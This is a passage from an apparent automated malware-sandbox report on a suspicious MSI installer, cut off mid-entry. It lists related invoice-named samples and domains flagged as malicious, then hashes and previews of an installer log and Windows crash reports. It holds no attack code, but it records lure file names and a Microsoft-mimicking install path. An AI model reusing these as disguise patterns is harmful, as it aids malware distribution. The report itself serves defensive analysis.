                                Fact30.NATURGY.LUNESGRLNOPAGOID3012021414252024.MSI.msiGet hashmaliciousUnknownBrowse
                                  Fact28.NATURGY.SABADONOPAGOID28122024.MSI.msiGet hashmaliciousUnknownBrowse
                                    bmouJCkvam.msiGet hashmaliciousUnknownBrowse
                                      FS-SZHAJCVS.msiGet hashmaliciousUnknownBrowse
                                        FS-JFDIBGWE.msiGet hashmaliciousUnknownBrowse
                                          http://propdfhub.comGet hashmaliciousUnknownBrowse
                                            http://res.pdfonestartlive.comGet hashmaliciousUnknownBrowse
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):9922
                                              Entropy (8bit):5.544789337834167
                                              Encrypted:false
                                              SSDEEP:96:XrAOBrdhXAZi69qIZNR19UcUHx3bLTCYThqU9UcUHx3bLTCGji8yMnThqNHZfSGj:XrV0iuFOBOEmBO4V0/pB/x
                                              MD5:A28A7AFBDE66754EB78774FD990BF322
                                              SHA1:B852C71B7947D753FEAF8ED788ED274ACC7EEFE0
                                              SHA-256:7037C9C7AD07ED8E629CB9891D1F690C2DB7FD1F26762F3EF8042ABCAFA46D52
                                              SHA-512:564BB885428D42BBDBBE1798FB0F267DBB0898A358EB29C986CA7260D4CC1BCA3FEC036BA40FE2BDC2CE88EFCB70DDB338664039956E9F29D869CA522FEF8912
                                              Malicious:false
                                              Reputation:low
                                              Preview:...@IXOS.@.....@et/Z.@.....@.....@.....@.....@.....@......&.{AD07A654-F9E0-4C2E-8281-C407422B8AAE}..Home Center..fiF8mxzUfw.msi.@.....@.....@.....@........&.{E5EC307B-28AA-4ABE-BD52-84862F31CDBE}.....@.....@.....@.....@.......@.....@.....@.......@......Home Center......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{C2C4E849-6E64-4794-8828-922124BA13B1}&.{AD07A654-F9E0-4C2E-8281-C407422B8AAE}.@......&.{3E136FF7-1E57-4F46-B6D8-8A1257E82A5E}&.{AD07A654-F9E0-4C2E-8281-C407422B8AAE}.@......&.{F713780B-33DB-4A09-BFED-2E1AED853CCA}&.{AD07A654-F9E0-4C2E-8281-C407422B8AAE}.@......&.{31AB5A48-AD77-44ED-A16F-552ACC228D02}&.{AD07A654-F9E0-4C2E-8281-C407422B8AAE}.@........CreateFolders..Criando novas pastas..Pasta: [1]#.;.C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\.@........InstallFiles..Copiando arquivos novos*.A.r.q.u.i.v.o.:. .[.1.].,. .D.i.r.e.t...r.i.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.161178035657574
                                              Encrypted:false
                                              SSDEEP:192:vovz05J0o89Pj4sZr3yODggzuiFOZ24IO8y:s05qo89PjkgzuiFOY4IO8y
                                              MD5:7D671D7C05334B117A4CA9C5C8FDDD26
                                              SHA1:A72245B9315C367DC640AC25B81C8A17892F0B58
                                              SHA-256:B38700EFA96430F6491FBD7A782E99151E5BA355F086D192DB64160B86C6654B
                                              SHA-512:61C9DD636B78E825743BFBAAC90D100CFE2C4D80F975B81E396A96DC8745F4FF17C81A88CABAFBB88841490B07BA3AE4C17BA82716F1B5BD85AD1DBDC7AE4236
                                              Malicious:false
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.4.3.4.6.8.4.8.4.2.8.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.4.3.4.6.8.8.5.9.2.8.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.6.8.f.9.a.5.-.0.d.0.8.-.4.3.6.1.-.9.5.1.a.-.6.b.6.f.3.a.8.6.7.a.6.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.e.4.3.d.2.9.-.7.8.a.b.-.4.2.8.a.-.9.0.1.7.-.7.b.5.f.9.f.a.4.c.b.5.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.-.f.i.i. .C.o.r.p.o.r.a.t.i.v.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.8.4.-.0.0.0.1.-.0.0.1.4.-.b.d.7.d.-.0.a.b.6.8.4.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.9.e.5.6.7.d.f.6.b.2.9.0.8.2.e.1.6.8.d.f.0.0.7.6.9.7.e.0.9.9.f.0.0.0.0.f.f.f.f.!.0.0.0.0.f.d.d.f.c.d.3.e.7.0.e.8.e.2.6.d.3.c.4.f.2.5.b.d.5.f.d.0.e.0.e.c.4.1.e.6.1.d.9.d.!.W.i.-.f.i.i. .C.o.r.p.o.r.a.t.i.v.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.1606459871772932
                                              Encrypted:false
                                              SSDEEP:192:b/vz0fJ0o89Pj4sZr3yODggzuiFfZ24IO8y:v0fqo89PjkgzuiFfY4IO8y
                                              MD5:E42FE09E169B4697225B4F987F942ACD
                                              SHA1:503B6F120A77D7D7E3AB3F5AF77A8018171E58B4
                                              SHA-256:3064937D693AA04E03D37B1999FB8B6AAA2FD19FD4603AE4BBEBDBB0A0571B0A
                                              SHA-512:6CB474108BCB04C0944E45A10B7B7C50DAD0C8C06C6BB1E75F866C93122087738E169F3E0A7BE98BD0E3B9D35723A459EF75C9E7D4BF11DADB359259AF7B5673
                                              Malicious:false
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.4.3.3.6.9.3.0.4.1.8.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.4.3.3.6.9.9.2.9.1.8.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.f.8.1.f.7.4.-.4.3.b.2.-.4.a.4.c.-.9.f.7.2.-.d.a.f.c.d.a.1.6.0.0.6.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.8.d.4.7.6.c.-.d.8.5.0.-.4.6.b.7.-.b.f.6.6.-.b.a.e.6.a.8.d.3.3.d.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.-.f.i.i. .C.o.r.p.o.r.a.t.i.v.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.d.c.-.0.0.0.1.-.0.0.1.4.-.5.8.7.a.-.c.e.b.0.8.4.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.9.e.5.6.7.d.f.6.b.2.9.0.8.2.e.1.6.8.d.f.0.0.7.6.9.7.e.0.9.9.f.0.0.0.0.f.f.f.f.!.0.0.0.0.f.d.d.f.c.d.3.e.7.0.e.8.e.2.6.d.3.c.4.f.2.5.b.d.5.f.d.0.e.0.e.c.4.1.e.6.1.d.9.d.!.W.i.-.f.i.i. .C.o.r.p.o.r.a.t.i.v.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.1610821371247864
                                              Encrypted:false
                                              SSDEEP:192:lTMpvz0hF0kVvf9j4sZr3yODggzuiFfZ24IO8y:40hmkVvf9jkgzuiFfY4IO8y
                                              MD5:1431B5C2BA2E15508BCC40566AA6F820
                                              SHA1:DA852BADBDA11AC6E30CDDC70A281D73C2D8029C
                                              SHA-256:06812ACC90330426459906DEEB22B08D51A5C96EECD34AC5B77C7D13ABF71E04
                                              SHA-512:C6E52CDA5E951CA3733B7CCC375C0C6B1C19F51E35CF39007BBD71A9E1A94163859062C381BBC81D1022654CE3A1F6167B2D80F38AC44EE51DCC0A723CEAFDA0
                                              Malicious:false
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.4.3.3.7.2.8.1.3.3.1.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.4.3.3.7.3.3.9.1.4.6.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.f.6.3.5.8.2.-.6.2.c.e.-.4.6.4.a.-.9.2.6.8.-.d.1.6.9.8.3.b.b.9.6.1.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.5.3.1.3.a.b.-.3.0.4.e.-.4.d.0.b.-.a.b.d.0.-.6.9.b.f.2.a.7.2.0.9.5.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.-.f.i.i. .C.o.r.p.o.r.a.t.i.v.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.d.c.-.0.0.0.1.-.0.0.1.4.-.5.8.7.a.-.c.e.b.0.8.4.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.9.e.5.6.7.d.f.6.b.2.9.0.8.2.e.1.6.8.d.f.0.0.7.6.9.7.e.0.9.9.f.0.0.0.0.f.f.f.f.!.0.0.0.0.f.d.d.f.c.d.3.e.7.0.e.8.e.2.6.d.3.c.4.f.2.5.b.d.5.f.d.0.e.0.e.c.4.1.e.6.1.d.9.d.!.W.i.-.f.i.i. .C.o.r.p.o.r.a.t.i.v.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.161235368614132
                                              Encrypted:false
                                              SSDEEP:192:Xnkvz0mF0kVvf9j4sZr3yODggzuiFOZ24IO8y:3Y0mmkVvf9jkgzuiFOY4IO8y
                                              MD5:45D3C1C615B61887B959F8A264B5DD90
                                              SHA1:8FCBED1989DEE31C400F8F3DC387481DA395AAB1
                                              SHA-256:A6E9CB6AA060C70B622DE6AD074C38B781A87D1372683936B67EF8A22A72BEEA
                                              SHA-512:5FEA1837F6C0B569E9511C0ACC87D6B4121DBEB0050277F3E8230D8613C550A59C94B295F72301E932DBCB26C6DD28012442986E50C0AE58324DF2BC28E0C2A2
                                              Malicious:false
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.4.3.4.7.0.8.4.9.7.6.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.4.3.4.7.1.1.9.3.5.1.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.2.a.0.b.7.3.-.a.b.b.b.-.4.2.e.9.-.9.9.e.e.-.c.c.7.1.b.0.2.4.2.6.6.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.6.1.0.a.1.8.-.6.5.f.c.-.4.1.a.a.-.b.9.5.3.-.6.f.5.8.f.4.3.3.6.b.f.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.-.f.i.i. .C.o.r.p.o.r.a.t.i.v.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.8.4.-.0.0.0.1.-.0.0.1.4.-.b.d.7.d.-.0.a.b.6.8.4.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.9.e.5.6.7.d.f.6.b.2.9.0.8.2.e.1.6.8.d.f.0.0.7.6.9.7.e.0.9.9.f.0.0.0.0.f.f.f.f.!.0.0.0.0.f.d.d.f.c.d.3.e.7.0.e.8.e.2.6.d.3.c.4.f.2.5.b.d.5.f.d.0.e.0.e.c.4.1.e.6.1.d.9.d.!.W.i.-.f.i.i. .C.o.r.p.o.r.a.t.i.v.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:36:09 2025, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):47486
                                              Entropy (8bit):2.7535033208869555
                                              Encrypted:false
                                              SSDEEP:384:F5T2U+Kblgf8UFLLVl7Tdlt8b9G/iXrASE:Pz+KJgf8UFLLzt8b0KXM
                                              MD5:D20DA830A16DD8B761B3D0AB218F2407
                                              SHA1:EE205136E088BC5C627496469CBDDD96200B8352
                                              SHA-256:3B0AC227A1554600041F1287D15CA7BAE1658F33FE5719AAE0DA2BE0E49B91A3
                                              SHA-512:9EEA25107A0C4A629F9455996CFDB3A81C2AB4CB7BA9C4DEBE2A41EA20A5E6F3480689E3EE265B9304985C588622E724F48B06494507E0A06832109782EDE0E6
                                              Malicious:false
                                              Preview:MDMP..a..... .......)..g............4...............<.......$....6..........T.......8...........T...........(...V............&...........'..............................................................................eJ.......(......GenuineIntel............T..............g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8372
                                              Entropy (8bit):3.697959406533585
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJYE6hGcO6YEICSUjjzgmf71prj89b+jsfPvKm:R6lXJD6S6YEtSUjXgmf7c+If7
                                              MD5:F033448DC2D04B85862B1C5D49D4D93E
                                              SHA1:5FA7C9DD49FEDC0C73EDBEBB1FAF5F88E52B6665
                                              SHA-256:94DBECBF298A00E04E25282BABB3A071805C391B4FBA7DB4111510070168C2C9
                                              SHA-512:301120AF25B96415B1DF5B3343DFA42978A16FA3F0B4AD8DC92279D0FA34598C8AB911E990B68E0C63B721193F93BB54E7579255DF4A9EF8AA0241DC751E15DD
                                              Malicious:false
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.1.5.6.<./.P.i.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4630
                                              Entropy (8bit):4.478212428189313
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zs1Jg77aI9GBWpW8VYk0Ym8M4JS5uq1FKk+q8eNEqIvBaYrrI9Jd:uIjfPI7IQ7V5BJWuqakzuquBaYrrmJd
                                              MD5:76B74D1CFD81E4C36A736A4493BACE45
                                              SHA1:91915470871A20E15620840EA40C9F095BCDF2B3
                                              SHA-256:AD665145E648786F5DAEF313DEDC79050D7D1FFC67092137D01D8A75DB4EE02D
                                              SHA-512:CD9FF1B516167F3D58F021CBC71FCDC49FD26362B00D92159E3104855C328635B7C99F24F5F74EAB0F3BC9BCA3E86F87DDB36AADAC3F7FF732D6C544845A621A
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677438" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:36:13 2025, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):43022
                                              Entropy (8bit):2.7732275143680325
                                              Encrypted:false
                                              SSDEEP:192:YOVt2X1rT2U+/QOg3vhmEZuO+x8+AWBwUVkX/Y6p+cvzK7SqvUjWJl9GwAY:sT2U+/ngf8woLVl0+yASyJ/9GnY
                                              MD5:48A0D9234650DA07BB52D1FB818BA96F
                                              SHA1:D1D1B84F88FDDF8368E5014BCA5ABE2580FB0A70
                                              SHA-256:B5B59E8B4F222CB78BC159DA732A90A81C3ECAC3CA2E13471339BED8415D584A
                                              SHA-512:60D1B3E7ACF31BBC77E84E8EBD1FEE9FFD3DB131EA84855F6546FBBCD6D27174074C7EB36C3B94771E06A24FA0F5601007014F8CDE2CB3804B94531A3A88AA67
                                              Malicious:false
                                              Preview:MDMP..a..... .......-..g............4...............<............6..........T.......8...........T............-..6z...........&...........'..............................................................................eJ.......(......GenuineIntel............T..............g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8380
                                              Entropy (8bit):3.701920760656889
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJYt6kT6YEIbSUY3dgmfP6tpDt89b1jsfTHm:R6lXJq6w6YEUSUYNgmfP6y1Ifq
                                              MD5:7220E5C6F4F487BF42CD15760882A440
                                              SHA1:967792DB13FB4D99B1C6BE84DFD0EB550745ADA6
                                              SHA-256:556179B42E582C28C2279FFD907954D93805FECE965AE0C3E34AC419CAE687C5
                                              SHA-512:9C1B10EBB991164723B1EDF780DF46BFC7ADD93144ED2989125C365D27EC1D6F5B6FAC7C4553E3410D1D57754EFA20C44F84610F943A3BB486246C1290AD062F
                                              Malicious:false
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.1.5.6.<./.P.i.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4630
                                              Entropy (8bit):4.477595041276286
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zs1Jg77aI9GBWpW8VYZvYm8M4JS5Iq1Ff+q8enEqIvBaYrrI9Jd:uIjfPI7IQ7V2yJWIqvzEquBaYrrmJd
                                              MD5:130506FB2B5B1538C90A5C30445EF257
                                              SHA1:6D6015C5289CBDCA2F75BBA31ADCC09350B17AF9
                                              SHA-256:67BED12DB18970785054C2560AEE983B13FE3BB973BA4BB83A9D6D2C0A2F8A46
                                              SHA-512:BC8837D58A68BB41459C95D4919EB8F6F92914E83597D3D60CA29606BCFCAD1AF562EEE11D5D3EEFB45964E4A99B6962B75443DD1CFB3E9A3B2E7518D0067C26
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677438" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:37:48 2025, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):47218
                                              Entropy (8bit):2.72732709525575
                                              Encrypted:false
                                              SSDEEP:192:xRfH2X5rT2U+WBuOg3vhmf8eVmg8Bd8LWyVf2Ora9srD+KOZ3jmMZjG2T+Dn:ruT2U+Egf8f8dgyd8qCVraaOBr62T+Dn
                                              MD5:56FCB883C8E5376BE0D54BF0A59565C4
                                              SHA1:1B2A6492E55D463A3721C724EB645E514B97813C
                                              SHA-256:073EEAE6CC315024FCF4D0D79422B8E7A1E9F307FA131A50CED9D82AE342271A
                                              SHA-512:73373F4A47E3E6E405CE59C0747DE824B91A4AF3A2320A72FB96A116CE4089B852292745093FCC6FF92834DFA64DB3A4D29F2BAE0F4AE7ECB413D2CF06DB80FF
                                              Malicious:false
                                              Preview:MDMP..a..... ..........g............4...............<.......4....6..........T.......8...........T...........(...J............&...........'..............................................................................eJ.......(......GenuineIntel............T..........."..gN............................ ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8376
                                              Entropy (8bit):3.6985335630203586
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJKjE6UZR6YEI6SUhmgmf71pra89biJsfDWm:R6lXJsE6UZR6YE1SUQgmf7riifL
                                              MD5:8E5CC4321FB2B2A1218D73F98DC02C92
                                              SHA1:4E4B0448573C155AE7B851A8F5D37107F4205C76
                                              SHA-256:35F09525633B0D6C3DA48E9C2490F691FA84D74B4809E017F382EED18F4C103C
                                              SHA-512:9A173C8D9023CA93F19C54F9DFFA6C56092DD337FE787F5B129A4D77EE80770573F22EC02B869AE3AFE504805E8C8153FEBB3F1D480CA0A6FDB63E60807F46F0
                                              Malicious:false
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.0.8.<./.P.i.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4630
                                              Entropy (8bit):4.477791866915125
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zseJg77aI9GBWpW8VYzYm8M4JS5uq1FL1+q8eNEqjBaYrrI9N9d:uIjfUI7IQ7VbJWuqb1zuqjBaYrrmN9d
                                              MD5:780E794BBFD32D226C78F22777C1D171
